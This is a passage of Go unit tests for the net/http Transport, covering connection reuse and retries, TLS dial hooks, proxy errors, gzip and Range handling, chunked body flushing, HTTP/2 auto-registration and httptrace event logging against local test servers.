3092 }
3093 logf("Write(%q)", p)
3094 return c.Write(p)
3095 },
3096 }, nil
3097 }
3098
3099 SetRoundTripRetried(func() {
3100 logf("Retried.")
3101 })
3102 defer SetRoundTripRetried(nil)
3103
3104 for i := 0; i < 3; i++ {
3105 t0 := time.Now()
3106 res, err := c.Do(tc.req())
3107 if err != nil {
3108 if time.Since(t0) < MaxWriteWaitBeforeConnReuse/2 {
3109 mu.Lock()
3110 got := logbuf.String()
3111 mu.Unlock()
3112 t.Fatalf("i=%d: Do = %v; log:\n%s", i, err, got)
3113 }
3114 t.Skipf("connection likely wasn't recycled within %d, interfering with actual test; skipping", MaxWriteWaitBeforeConnReuse)
3115 }
3116 res.Body.Close()
3117 }
3118
3119 mu.Lock()
3120 got := logbuf.String()
3121 mu.Unlock()
3122 want := fmt.Sprintf(`Dial
3123 Write("%s")
3124 Handler
3125 intentional write failure
3126 Retried.
3127 Dial
3128 Write("%s")
3129 Handler
3130 Write("%s")
3131 Handler
3132 `, tc.reqString, tc.reqString, tc.reqString)
3133 if got != want {
3134 t.Errorf("Log of events differs. Got:\n%s\nWant:\n%s", got, want)
3135 }
3136 })
3137 }
3138 }
3139
3140 // Issue 6981
3141 func TestTransportClosesBodyOnError(t *testing.T) {
3142 setParallel(t)
3143 defer afterTest(t)
3144 readBody := make(chan error, 1)
3145 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
3146 _, err := ioutil.ReadAll(r.Body)
3147 readBody <- err
3148 }))
3149 defer ts.Close()
3150 c := ts.Client()
3151 fakeErr := errors.New("fake error")
3152 didClose := make(chan bool, 1)
3153 req, _ := NewRequest("POST", ts.URL, struct {
3154 io.Reader
3155 io.Closer
3156 }{
3157 io.MultiReader(io.LimitReader(neverEnding('x'), 1<<20), errorReader{fakeErr}),
3158 closerFunc(func() error {
3159 select {
3160 case didClose <- true:
3161 default:
3162 }
3163 return nil
3164 }),
3165 })
3166 res, err := c.Do(req)
3167 if res != nil {
3168 defer res.Body.Close()
3169 }
3170 if err == nil || !strings.Contains(err.Error(), fakeErr.Error()) {
3171 t.Fatalf("Do error = %v; want something containing %q", err, fakeErr.Error())
3172 }
3173 select {
3174 case err := <-readBody:
3175 if err == nil {
3176 t.Errorf("Unexpected success reading request body from handler; want 'unexpected EOF reading trailer'")
3177 }
3178 case <-time.After(5 * time.Second):
3179 t.Error("timeout waiting for server handler to complete")
3180 }
3181 select {
3182 case <-didClose:
3183 default:
3184 t.Errorf("didn't see Body.Close")
3185 }
3186 }
3187
3188 func TestTransportDialTLS(t *testing.T) {
3189 setParallel(t)
3190 defer afterTest(t)
3191 var mu sync.Mutex // guards following
3192 var gotReq, didDial bool
3193
3194 ts := httptest.NewTLSServer(HandlerFunc(func(w ResponseWriter, r *Request) {
3195 mu.Lock()
3196 gotReq = true
3197 mu.Unlock()
3198 }))
3199 defer ts.Close()
3200 c := ts.Client()
3201 c.Transport.(*Transport).DialTLS = func(netw, addr string) (net.Conn, error) {
3202 mu.Lock()
3203 didDial = true
3204 mu.Unlock()
3205 c, err := tls.Dial(netw, addr, c.Transport.(*Transport).TLSClientConfig)
3206 if err != nil {
3207 return nil, err
3208 }
3209 return c, c.Handshake()
3210 }
3211
3212 res, err := c.Get(ts.URL)
3213 if err != nil {
3214 t.Fatal(err)
3215 }
3216 res.Body.Close()
3217 mu.Lock()
3218 if !gotReq {
3219 t.Error("didn't get request")
3220 }
3221 if !didDial {
3222 t.Error("didn't use dial hook")
3223 }
3224 }
3225
3226 // Test for issue 8755
3227 // Ensure that if a proxy returns an error, it is exposed by RoundTrip
3228 func TestRoundTripReturnsProxyError(t *testing.T) {
3229 badProxy := func(*Request) (*url.URL, error) {
3230 return nil, errors.New("errorMessage")
3231 }
3232
3233 tr := &Transport{Proxy: badProxy}
3234
3235 req, _ := NewRequest("GET", "http://example.com", nil)
3236
3237 _, err := tr.RoundTrip(req)
3238
3239 if err == nil {
3240 t.Error("Expected proxy error to be returned by RoundTrip")
3241 }
3242 }
3243
3244 // tests that putting an idle conn after a call to CloseIdleConns does return it
3245 func TestTransportCloseIdleConnsThenReturn(t *testing.T) {
3246 tr := &Transport{}
3247 wantIdle := func(when string, n int) bool {
3248 got := tr.IdleConnCountForTesting("http", "example.com") // key used by PutIdleTestConn
3249 if got == n {
3250 return true
3251 }
3252 t.Errorf("%s: idle conns = %d; want %d", when, got, n)
3253 return false
3254 }
3255 wantIdle("start", 0)
3256 if !tr.PutIdleTestConn("http", "example.com") {
3257 t.Fatal("put failed")
3258 }
3259 if !tr.PutIdleTestConn("http", "example.com") {
3260 t.Fatal("second put failed")
3261 }
3262 wantIdle("after put", 2)
3263 tr.CloseIdleConnections()
3264 if !tr.IsIdleForTesting() {
3265 t.Error("should be idle after CloseIdleConnections")
3266 }
3267 wantIdle("after close idle", 0)
3268 if tr.PutIdleTestConn("http", "example.com") {
3269 t.Fatal("put didn't fail")
3270 }
3271 wantIdle("after second put", 0)
3272
3273 tr.RequestIdleConnChForTesting() // should toggle the transport out of idle mode
3274 if tr.IsIdleForTesting() {
3275 t.Error("shouldn't be idle after RequestIdleConnChForTesting")
3276 }
3277 if !tr.PutIdleTestConn("http", "example.com") {
3278 t.Fatal("after re-activation")
3279 }
3280 wantIdle("after final put", 1)
3281 }
3282
3283 // This tests that an client requesting a content range won't also
3284 // implicitly ask for gzip support. If they want that, they need to do it
3285 // on their own.
3286 // golang.org/issue/8923
3287 func TestTransportRangeAndGzip(t *testing.T) {
3288 defer afterTest(t)
3289 reqc := make(chan *Request, 1)
3290 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
3291 reqc <- r
3292 }))
3293 defer ts.Close()
3294 c := ts.Client()
3295
3296 req, _ := NewRequest("GET", ts.URL, nil)
3297 req.Header.Set("Range", "bytes=7-11")
3298 res, err := c.Do(req)
3299 if err != nil {
3300 t.Fatal(err)
3301 }
3302
3303 select {
3304 case r := <-reqc:
3305 if strings.Contains(r.Header.Get("Accept-Encoding"), "gzip") {
3306 t.Error("Transport advertised gzip support in the Accept header")
3307 }
3308 if r.Header.Get("Range") == "" {
3309 t.Error("no Range in request")
3310 }
3311 case <-time.After(10 * time.Second):
3312 t.Fatal("timeout")
3313 }
3314 res.Body.Close()
3315 }
3316
3317 // Test for issue 10474
3318 func TestTransportResponseCancelRace(t *testing.T) {
3319 defer afterTest(t)
3320
3321 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
3322 // important that this response has a body.
3323 var b [1024]byte
3324 w.Write(b[:])
3325 }))
3326 defer ts.Close()
3327 tr := ts.Client().Transport.(*Transport)
3328
3329 req, err := NewRequest("GET", ts.URL, nil)
3330 if err != nil {
3331 t.Fatal(err)
3332 }
3333 res, err := tr.RoundTrip(req)
3334 if err != nil {
3335 t.Fatal(err)
3336 }
3337 // If we do an early close, Transport just throws the connection away and
3338 // doesn't reuse it. In order to trigger the bug, it has to reuse the connection
3339 // so read the body
3340 if _, err := io.Copy(ioutil.Discard, res.Body); err != nil {
3341 t.Fatal(err)
3342 }
3343
3344 req2, err := NewRequest("GET", ts.URL, nil)
3345 if err != nil {
3346 t.Fatal(err)
3347 }
3348 tr.CancelRequest(req)
3349 res, err = tr.RoundTrip(req2)
3350 if err != nil {
3351 t.Fatal(err)
3352 }
3353 res.Body.Close()
3354 }
3355
3356 // Test for issue 19248: Content-Encoding's value is case insensitive.
3357 func TestTransportContentEncodingCaseInsensitive(t *testing.T) {
3358 setParallel(t)
3359 defer afterTest(t)
3360 for _, ce := range []string{"gzip", "GZIP"} {
3361 ce := ce
3362 t.Run(ce, func(t *testing.T) {
3363 const encodedString = "Hello Gopher"
3364 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
3365 w.Header().Set("Content-Encoding", ce)
3366 gz := gzip.NewWriter(w)
3367 gz.Write([]byte(encodedString))
3368 gz.Close()
3369 }))
3370 defer ts.Close()
3371
3372 res, err := ts.Client().Get(ts.URL)
3373 if err != nil {
3374 t.Fatal(err)
3375 }
3376
3377 body, err := ioutil.ReadAll(res.Body)
3378 res.Body.Close()
3379 if err != nil {
3380 t.Fatal(err)
3381 }
3382
3383 if string(body) != encodedString {
3384 t.Fatalf("Expected body %q, got: %q\n", encodedString, string(body))
3385 }
3386 })
3387 }
3388 }
3389
3390 func TestTransportDialCancelRace(t *testing.T) {
3391 defer afterTest(t)
3392
3393 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {}))
3394 defer ts.Close()
3395 tr := ts.Client().Transport.(*Transport)
3396
3397 req, err := NewRequest("GET", ts.URL, nil)
3398 if err != nil {
3399 t.Fatal(err)
3400 }
3401 SetEnterRoundTripHook(func() {
3402 tr.CancelRequest(req)
3403 })
3404 defer SetEnterRoundTripHook(nil)
3405 res, err := tr.RoundTrip(req)
3406 if err != ExportErrRequestCanceled {
3407 t.Errorf("expected canceled request error; got %v", err)
3408 if err == nil {
3409 res.Body.Close()
3410 }
3411 }
3412 }
3413
3414 // logWritesConn is a net.Conn that logs each Write call to writes
3415 // and then proxies to w.
3416 // It proxies Read calls to a reader it receives from rch.
3417 type logWritesConn struct {
3418 net.Conn // nil. crash on use.
3419
3420 w io.Writer
3421
3422 rch <-chan io.Reader
3423 r io.Reader // nil until received by rch
3424
3425 mu sync.Mutex
3426 writes []string
3427 }
3428
3429 func (c *logWritesConn) Write(p []byte) (n int, err error) {
3430 c.mu.Lock()
3431 defer c.mu.Unlock()
3432 c.writes = append(c.writes, string(p))
3433 return c.w.Write(p)
3434 }
3435
3436 func (c *logWritesConn) Read(p []byte) (n int, err error) {
3437 if c.r == nil {
3438 c.r = <-c.rch
3439 }
3440 return c.r.Read(p)
3441 }
3442
3443 func (c *logWritesConn) Close() error { return nil }
3444
3445 // Issue 6574
3446 func TestTransportFlushesBodyChunks(t *testing.T) {
3447 defer afterTest(t)
3448 resBody := make(chan io.Reader, 1)
3449 connr, connw := io.Pipe() // connection pipe pair
3450 lw := &logWritesConn{
3451 rch: resBody,
3452 w: connw,
3453 }
3454 tr := &Transport{
3455 Dial: func(network, addr string) (net.Conn, error) {
3456 return lw, nil
3457 },
3458 }
3459 bodyr, bodyw := io.Pipe() // body pipe pair
3460 go func() {
3461 defer bodyw.Close()
3462 for i := 0; i < 3; i++ {
3463 fmt.Fprintf(bodyw, "num%d\n", i)
3464 }
3465 }()
3466 resc := make(chan *Response)
3467 go func() {
3468 req, _ := NewRequest("POST", "http://localhost:8080", bodyr)
3469 req.Header.Set("User-Agent", "x") // known value for test
3470 res, err := tr.RoundTrip(req)
3471 if err != nil {
3472 t.Errorf("RoundTrip: %v", err)
3473 close(resc)
3474 return
3475 }
3476 resc <- res
3477
3478 }()
3479 // Fully consume the request before checking the Write log vs. want.
3480 req, err := ReadRequest(bufio.NewReader(connr))
3481 if err != nil {
3482 t.Fatal(err)
3483 }
3484 io.Copy(ioutil.Discard, req.Body)
3485
3486 // Unblock the transport's roundTrip goroutine.
3487 resBody <- strings.NewReader("HTTP/1.1 204 No Content\r\nConnection: close\r\n\r\n")
3488 res, ok := <-resc
3489 if !ok {
3490 return
3491 }
3492 defer res.Body.Close()
3493
3494 want := []string{
3495 "POST / HTTP/1.1\r\nHost: localhost:8080\r\nUser-Agent: x\r\nTransfer-Encoding: chunked\r\nAccept-Encoding: gzip\r\n\r\n",
3496 "5\r\nnum0\n\r\n",
3497 "5\r\nnum1\n\r\n",
3498 "5\r\nnum2\n\r\n",
3499 "0\r\n\r\n",
3500 }
3501 if !reflect.DeepEqual(lw.writes, want) {
3502 t.Errorf("Writes differed.\n Got: %q\nWant: %q\n", lw.writes, want)
3503 }
3504 }
3505
3506 // Issue 22088: flush Transport request headers if we're not sure the body won't block on read.
3507 func TestTransportFlushesRequestHeader(t *testing.T) {
3508 defer afterTest(t)
3509 gotReq := make(chan struct{})
3510 cst := newClientServerTest(t, h1Mode, HandlerFunc(func(w ResponseWriter, r *Request) {
3511 close(gotReq)
3512 }))
3513 defer cst.close()
3514
3515 pr, pw := io.Pipe()
3516 req, err := NewRequest("POST", cst.ts.URL, pr)
3517 if err != nil {
3518 t.Fatal(err)
3519 }
3520 gotRes := make(chan struct{})
3521 go func() {
3522 defer close(gotRes)
3523 res, err := cst.tr.RoundTrip(req)
3524 if err != nil {
3525 t.Error(err)
3526 return
3527 }
3528 res.Body.Close()
3529 }()
3530
3531 select {
3532 case <-gotReq:
3533 pw.Close()
3534 case <-time.After(5 * time.Second):
3535 t.Fatal("timeout waiting for handler to get request")
3536 }
3537 <-gotRes
3538 }
3539
3540 // Issue 11745.
3541 func TestTransportPrefersResponseOverWriteError(t *testing.T) {
3542 if testing.Short() {
3543 t.Skip("skipping in short mode")
3544 }
3545 defer afterTest(t)
3546 const contentLengthLimit = 1024 * 1024 // 1MB
3547 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
3548 if r.ContentLength >= contentLengthLimit {
3549 w.WriteHeader(StatusBadRequest)
3550 r.Body.Close()
3551 return
3552 }
3553 w.WriteHeader(StatusOK)
3554 }))
3555 defer ts.Close()
3556 c := ts.Client()
3557
3558 fail := 0
3559 count := 100
3560 bigBody := strings.Repeat("a", contentLengthLimit*2)
3561 for i := 0; i < count; i++ {
3562 req, err := NewRequest("PUT", ts.URL, strings.NewReader(bigBody))
3563 if err != nil {
3564 t.Fatal(err)
3565 }
3566 resp, err := c.Do(req)
3567 if err != nil {
3568 fail++
3569 t.Logf("%d = %#v", i, err)
3570 if ue, ok := err.(*url.Error); ok {
3571 t.Logf("urlErr = %#v", ue.Err)
3572 if ne, ok := ue.Err.(*net.OpError); ok {
3573 t.Logf("netOpError = %#v", ne.Err)
3574 }
3575 }
3576 } else {
3577 resp.Body.Close()
3578 if resp.StatusCode != 400 {
3579 t.Errorf("Expected status code 400, got %v", resp.Status)
3580 }
3581 }
3582 }
3583 if fail > 0 {
3584 t.Errorf("Failed %v out of %v\n", fail, count)
3585 }
3586 }
3587
3588 func TestTransportAutomaticHTTP2(t *testing.T) {
3589 testTransportAutoHTTP(t, &Transport{}, true)
3590 }
3591
3592 // golang.org/issue/14391: also check DefaultTransport
3593 func TestTransportAutomaticHTTP2_DefaultTransport(t *testing.T) {
3594 testTransportAutoHTTP(t, DefaultTransport.(*Transport), true)
3595 }
3596
3597 func TestTransportAutomaticHTTP2_TLSNextProto(t *testing.T) {
3598 testTransportAutoHTTP(t, &Transport{
3599 TLSNextProto: make(map[string]func(string, *tls.Conn) RoundTripper),
3600 }, false)
3601 }
3602
3603 func TestTransportAutomaticHTTP2_TLSConfig(t *testing.T) {
3604 testTransportAutoHTTP(t, &Transport{
3605 TLSClientConfig: new(tls.Config),
3606 }, false)
3607 }
3608
3609 func TestTransportAutomaticHTTP2_ExpectContinueTimeout(t *testing.T) {
3610 testTransportAutoHTTP(t, &Transport{
3611 ExpectContinueTimeout: 1 * time.Second,
3612 }, true)
3613 }
3614
3615 func TestTransportAutomaticHTTP2_Dial(t *testing.T) {
3616 var d net.Dialer
3617 testTransportAutoHTTP(t, &Transport{
3618 Dial: d.Dial,
3619 }, false)
3620 }
3621
3622 func TestTransportAutomaticHTTP2_DialTLS(t *testing.T) {
3623 testTransportAutoHTTP(t, &Transport{
3624 DialTLS: func(network, addr string) (net.Conn, error) {
3625 panic("unused")
3626 },
3627 }, false)
3628 }
3629
3630 func testTransportAutoHTTP(t *testing.T, tr *Transport, wantH2 bool) {
3631 _, err := tr.RoundTrip(new(Request))
3632 if err == nil {
3633 t.Error("expected error from RoundTrip")
3634 }
3635 if reg := tr.TLSNextProto["h2"] != nil; reg != wantH2 {
3636 t.Errorf("HTTP/2 registered = %v; want %v", reg, wantH2)
3637 }
3638 }
3639
3640 // Issue 13633: there was a race where we returned bodyless responses
3641 // to callers before recycling the persistent connection, which meant
3642 // a client doing two subsequent requests could end up on different
3643 // connections. It's somewhat harmless but enough tests assume it's
3644 // not true in order to test other things that it's worth fixing.
3645 // Plus it's nice to be consistent and not have timing-dependent
3646 // behavior.
3647 func TestTransportReuseConnEmptyResponseBody(t *testing.T) {
3648 defer afterTest(t)
3649 cst := newClientServerTest(t, h1Mode, HandlerFunc(func(w ResponseWriter, r *Request) {
3650 w.Header().Set("X-Addr", r.RemoteAddr)
3651 // Empty response body.
3652 }))
3653 defer cst.close()
3654 n := 100
3655 if testing.Short() {
3656 n = 10
3657 }
3658 var firstAddr string
3659 for i := 0; i < n; i++ {
3660 res, err := cst.c.Get(cst.ts.URL)
3661 if err != nil {
3662 log.Fatal(err)
3663 }
3664 addr := res.Header.Get("X-Addr")
3665 if i == 0 {
3666 firstAddr = addr
3667 } else if addr != firstAddr {
3668 t.Fatalf("On request %d, addr %q != original addr %q", i+1, addr, firstAddr)
3669 }
3670 res.Body.Close()
3671 }
3672 }
3673
3674 // Issue 13839
3675 func TestNoCrashReturningTransportAltConn(t *testing.T) {
3676 cert, err := tls.X509KeyPair(internal.LocalhostCert, internal.LocalhostKey)
3677 if err != nil {
3678 t.Fatal(err)
3679 }
3680 ln := newLocalListener(t)
3681 defer ln.Close()
3682
3683 handledPendingDial := make(chan bool, 1)
3684 SetPendingDialHooks(nil, func() { handledPendingDial <- true })
3685 defer SetPendingDialHooks(nil, nil)
3686
3687 testDone := make(chan struct{})
3688 defer close(testDone)
3689 go func() {
3690 tln := tls.NewListener(ln, &tls.Config{
3691 NextProtos: []string{"foo"},
3692 Certificates: []tls.Certificate{cert},
3693 })
3694 sc, err := tln.Accept()
3695 if err != nil {
3696 t.Error(err)
3697 return
3698 }
3699 if err := sc.(*tls.Conn).Handshake(); err != nil {
3700 t.Error(err)
3701 return
3702 }
3703 <-testDone
3704 sc.Close()
3705 }()
3706
3707 addr := ln.Addr().String()
3708
3709 req, _ := NewRequest("GET", "https://fake.tld/", nil)
3710 cancel := make(chan struct{})
3711 req.Cancel = cancel
3712
3713 doReturned := make(chan bool, 1)
3714 madeRoundTripper := make(chan bool, 1)
3715
3716 tr := &Transport{
3717 DisableKeepAlives: true,
3718 TLSNextProto: map[string]func(string, *tls.Conn) RoundTripper{
3719 "foo": func(authority string, c *tls.Conn) RoundTripper {
3720 madeRoundTripper <- true
3721 return funcRoundTripper(func() {
3722 t.Error("foo RoundTripper should not be called")
3723 })
3724 },
3725 },
3726 Dial: func(_, _ string) (net.Conn, error) {
3727 panic("shouldn't be called")
3728 },
3729 DialTLS: func(_, _ string) (net.Conn, error) {
3730 tc, err := tls.Dial("tcp", addr, &tls.Config{
3731 InsecureSkipVerify: true,
3732 NextProtos: []string{"foo"},
3733 })
3734 if err != nil {
3735 return nil, err
3736 }
3737 if err := tc.Handshake(); err != nil {
3738 return nil, err
3739 }
3740 close(cancel)
3741 <-doReturned
3742 return tc, nil
3743 },
3744 }
3745 c := &Client{Transport: tr}
3746
3747 _, err = c.Do(req)
3748 if ue, ok := err.(*url.Error); !ok || ue.Err != ExportErrRequestCanceledConn {
3749 t.Fatalf("Do error = %v; want url.Error with errRequestCanceledConn", err)
3750 }
3751
3752 doReturned <- true
3753 <-madeRoundTripper
3754 <-handledPendingDial
3755 }
3756
3757 func TestTransportReuseConnection_Gzip_Chunked(t *testing.T) {
3758 testTransportReuseConnection_Gzip(t, true)
3759 }
3760
3761 func TestTransportReuseConnection_Gzip_ContentLength(t *testing.T) {
3762 testTransportReuseConnection_Gzip(t, false)
3763 }
3764
3765 // Make sure we re-use underlying TCP connection for gzipped responses too.
3766 func testTransportReuseConnection_Gzip(t *testing.T, chunked bool) {
3767 setParallel(t)
3768 defer afterTest(t)
3769 addr := make(chan string, 2)
3770 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
3771 addr <- r.RemoteAddr
3772 w.Header().Set("Content-Encoding", "gzip")
3773 if chunked {
3774 w.(Flusher).Flush()
3775 }
3776 w.Write(rgz) // arbitrary gzip response
3777 }))
3778 defer ts.Close()
3779 c := ts.Client()
3780
3781 for i := 0; i < 2; i++ {
3782 res, err := c.Get(ts.URL)
3783 if err != nil {
3784 t.Fatal(err)
3785 }
3786 buf := make([]byte, len(rgz))
3787 if n, err := io.ReadFull(res.Body, buf); err != nil {
3788 t.Errorf("%d. ReadFull = %v, %v", i, n, err)
3789 }
3790 // Note: no res.Body.Close call. It should work without it,
3791 // since the flate.Reader's internal buffering will hit EOF
3792 // and that should be sufficient.
3793 }
3794 a1, a2 := <-addr, <-addr
3795 if a1 != a2 {
3796 t.Fatalf("didn't reuse connection")
3797 }
3798 }
3799
3800 func TestTransportResponseHeaderLength(t *testing.T) {
3801 setParallel(t)
3802 defer afterTest(t)
3803 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
3804 if r.URL.Path == "/long" {
3805 w.Header().Set("Long", strings.Repeat("a", 1<<20))
3806 }
3807 }))
3808 defer ts.Close()
3809 c := ts.Client()
3810 c.Transport.(*Transport).MaxResponseHeaderBytes = 512 << 10
3811
3812 if res, err := c.Get(ts.URL); err != nil {
3813 t.Fatal(err)
3814 } else {
3815 res.Body.Close()
3816 }
3817
3818 res, err := c.Get(ts.URL + "/long")
3819 if err == nil {
3820 defer res.Body.Close()
3821 var n int64
3822 for k, vv := range res.Header {
3823 for _, v := range vv {
3824 n += int64(len(k)) + int64(len(v))
3825 }
3826 }
3827 t.Fatalf("Unexpected success. Got %v and %d bytes of response headers", res.Status, n)
3828 }
3829 if want := "server response headers exceeded 524288 bytes"; !strings.Contains(err.Error(), want) {
3830 t.Errorf("got error: %v; want %q", err, want)
3831 }
3832 }
3833
3834 func TestTransportEventTrace(t *testing.T) { testTransportEventTrace(t, h1Mode, false) }
3835 func TestTransportEventTrace_h2(t *testing.T) { testTransportEventTrace(t, h2Mode, false) }
3836
3837 // test a non-nil httptrace.ClientTrace but with all hooks set to zero.
3838 func TestTransportEventTrace_NoHooks(t *testing.T) { testTransportEventTrace(t, h1Mode, true) }
3839 func TestTransportEventTrace_NoHooks_h2(t *testing.T) { testTransportEventTrace(t, h2Mode, true) }
3840
3841 func testTransportEventTrace(t *testing.T, h2 bool, noHooks bool) {
3842 defer afterTest(t)
3843 const resBody = "some body"
3844 gotWroteReqEvent := make(chan struct{}, 500)
3845 cst := newClientServerTest(t, h2, HandlerFunc(func(w ResponseWriter, r *Request) {
3846 if r.Method == "GET" {
3847 // Do nothing for the second request.
3848 return
3849 }
3850 if _, err := ioutil.ReadAll(r.Body); err != nil {
3851 t.Error(err)
3852 }
3853 if !noHooks {
3854 select {
3855 case <-gotWroteReqEvent:
3856 case <-time.After(5 * time.Second):
3857 t.Error("timeout waiting for WroteRequest event")
3858 }
3859 }
3860 io.WriteString(w, resBody)
3861 }))
3862 defer cst.close()
3863
3864 cst.tr.ExpectContinueTimeout = 1 * time.Second
3865
3866 var mu sync.Mutex // guards buf
3867 var buf bytes.Buffer
3868 logf := func(format string, args ...interface{}) {
3869 mu.Lock()
3870 defer mu.Unlock()
3871 fmt.Fprintf(&buf, format, args...)
3872 buf.WriteByte('\n')
3873 }
3874
3875 addrStr := cst.ts.Listener.Addr().String()
3876 ip, port, err := net.SplitHostPort(addrStr)
3877 if err != nil {
3878 t.Fatal(err)
3879 }
3880
3881 // Install a fake DNS server.
3882 ctx := context.WithValue(context.Background(), nettrace.LookupIPAltResolverKey{}, func(ctx context.Context, network, host string) ([]net.IPAddr, error) {
3883 if host != "dns-is-faked.golang" {
3884 t.Errorf("unexpected DNS host lookup for %q/%q", network, host)
3885 return nil, nil
3886 }
3887 return []net.IPAddr{{IP: net.ParseIP(ip)}}, nil
3888 })
3889
3890 body := "some body"
3891 req, _ := NewRequest("POST", cst.scheme()+"://dns-is-faked.golang:"+port, strings.NewReader(body))
3892 req.Header["X-Foo-Multiple-Vals"] = []string{"bar", "baz"}
3893 trace := &httptrace.ClientTrace{
3894 GetConn: func(hostPort string) { logf("Getting conn for %v ...", hostPort) },
3895 GotConn: func(ci httptrace.GotConnInfo) { logf("got conn: %+v", ci) },
3896 GotFirstResponseByte: func() { logf("first response byte") },
3897 PutIdleConn: func(err error) { logf("PutIdleConn = %v", err) },
3898 DNSStart: func(e httptrace.DNSStartInfo) { logf("DNS start: %+v", e) },
3899 DNSDone: func(e httptrace.DNSDoneInfo) { logf("DNS done: %+v", e) },
3900 ConnectStart: func(network, addr string) { logf("ConnectStart: Connecting to %s %s ...", network, addr) },
3901 ConnectDone: func(network, addr string, err error) {
3902 if err != nil {
3903 t.Errorf("ConnectDone: %v", err)
3904 }
3905 logf("ConnectDone: connected to %s %s = %v", network, addr, err)
3906 },
3907 WroteHeaderField: func(key string, value []string) {
3908 logf("WroteHeaderField: %s: %v", key, value)
3909 },
3910 WroteHeaders: func() {
3911 logf("WroteHeaders")
3912 },
3913 Wait100Continue: func() { logf("Wait100Continue") },
3914 Got100Continue: func() { logf("Got100Continue") },
3915 WroteRequest: func(e httptrace.WroteRequestInfo) {
3916 logf("WroteRequest: %+v", e)
3917 gotWroteReqEvent <- struct{}{}
3918 },
3919 }
3920 if h2 {
3921 trace.TLSHandshakeStart = func() { logf("tls handshake start") }
3922 trace.TLSHandshakeDone = func(s tls.ConnectionState, err error) {
3923 logf("tls handshake done. ConnectionState = %v \n err = %v", s, err)
3924 }
3925 }
3926 if noHooks {
3927 // zero out all func pointers, trying to get some path to crash
3928 *trace = httptrace.ClientTrace{}
3929 }
3930 req = req.WithContext(httptrace.WithClientTrace(ctx, trace))
3931
3932 req.Header.Set("Expect", "100-continue")
3933 res, err := cst.c.Do(req)
3934 if err != nil {
3935 t.Fatal(err)
3936 }
3937 logf("got roundtrip.response")
3938 slurp, err := ioutil.ReadAll(res.Body)
3939 if err != nil {
3940 t.Fatal(err)
3941 }
3942 logf("consumed body")
3943 if string(slurp) != resBody || res.StatusCode != 200 {
3944 t.Fatalf("Got %q, %v; want %q, 200 OK", slurp, res.Status, resBody)
3945 }
3946 res.Body.Close()
3947
3948 if noHooks {
3949 // Done at this point. Just testing a full HTTP
3950 // requests can happen with a trace pointing to a zero
3951 // ClientTrace, full of nil func pointers.
3952 return
3953 }
3954
3955 mu.Lock()
3956 got := buf.String()
3957 mu.Unlock()
3958
3959 wantOnce := func(sub string) {
3960 if strings.Count(got, sub) != 1 {
3961 t.Errorf("expected substring %q exactly once in output.", sub)
3962 }
3963 }
3964 wantOnceOrMore := func(sub string) {
3965 if strings.Count(got, sub) == 0 {
3966 t.Errorf("expected substring %q at least once in output.", sub)
3967 }
3968 }
3969 wantOnce("Getting conn for dns-is-faked.golang:" + port)
3970 wantOnce("DNS start: {Host:dns-is-faked.golang}")
3971 wantOnce("DNS done: {Addrs:[{IP:" + ip + " Zone:}] Err:<nil> Coalesced:false}")
3972 wantOnce("got conn: {")
3973 wantOnceOrMore("Connecting to tcp " + addrStr)
3974 wantOnceOrMore("connected to tcp " + addrStr + " = <nil>")
3975 wantOnce("Reused:false WasIdle:false IdleTime:0s")
3976 wantOnce("first response byte")
3977 if h2 {
3978 wantOnce("tls handshake start")
3979 wantOnce("tls handshake done")
3980 } else {
3981 wantOnce("PutIdleConn = <nil>")
3982 wantOnce("WroteHeaderField: User-Agent: [Go-http-client/1.1]")
3983 // TODO(meirf): issue 19761. Make these agnostic to h1/h2. (These are not h1 specific, but the
3984 // WroteHeaderField hook is not yet implemented in h2.)
3985 wantOnce(fmt.Sprintf("WroteHeaderField: Host: [dns-is-faked.golang:%s]", port))
3986 wantOnce(fmt.Sprintf("WroteHeaderField: Content-Length: [%d]", len(body)))
3987 wantOnce("WroteHeaderField: X-Foo-Multiple-Vals: [bar baz]")
3988 wantOnce("WroteHeaderField: Accept-Encoding: [gzip]")
3989 }
3990 wantOnce("WroteHeaders")
3991 wantOnce("Wait100Continue")
3992 wantOnce("Got100Continue")
3993 wantOnce("WroteRequest: {Err:<nil>}")
3994 if strings.Contains(got, " to udp ") {
3995 t.Errorf("should not see UDP (DNS) connections")
3996 }
3997 if t.Failed() {
3998 t.Errorf("Output:\n%s", got)
3999 }
4000
4001 // And do a second request:
4002 req, _ = NewRequest("GET", cst.scheme()+"://dns-is-faked.golang:"+port, nil)
4003 req = req.WithContext(httptrace.WithClientTrace(ctx, trace))
4004 res, err = cst.c.Do(req)
4005 if err != nil {
4006 t.Fatal(err)
4007 }
4008 if res.StatusCode != 200 {
4009 t.Fatal(res.Status)
4010 }
4011 res.Body.Close()
4012
4013 mu.Lock()
4014 got = buf.String()
4015 mu.Unlock()
4016
4017 sub := "Getting conn for dns-is-faked.golang:"
4018 if gotn, want := strings.Count(got, sub), 2; gotn != want {
4019 t.Errorf("substring %q appeared %d times; want %d. Log:\n%s", sub, gotn, want, got)
4020 }
4021
4022 }
4023
4024 func TestTransportEventTraceTLSVerify(t *testing.T) {
4025 var mu sync.Mutex
4026 var buf bytes.Buffer
4027 logf := func(format string, args ...interface{}) {
4028 mu.Lock()
4029 defer mu.Unlock()
4030 fmt.Fprintf(&buf, format, args...)
4031 buf.WriteByte('\n')
4032 }
4033
4034 ts := httptest.NewTLSServer(HandlerFunc(func(w ResponseWriter, r *Request) {
4035 t.Error("Unexpected request")
4036 }))
4037 defer ts.Close()
4038 ts.Config.ErrorLog = log.New(funcWriter(func(p []byte) (int, error) {
4039 logf("%s", p)
4040 return len(p), nil
4041 }), "", 0)
4042
4043 certpool := x509.NewCertPool()
4044 certpool.AddCert(ts.Certificate())
4045
4046 c := &Client{Transport: &Transport{
4047 TLSClientConfig: &tls.Config{
4048 ServerName: "dns-is-faked.golang",
4049 RootCAs: certpool,
4050 },
4051 }}
4052
4053 trace := &httptrace.ClientTrace{
4054 TLSHandshakeStart: func() { logf("TLSHandshakeStart") },
4055 TLSHandshakeDone: func(s tls.ConnectionState, err error) {
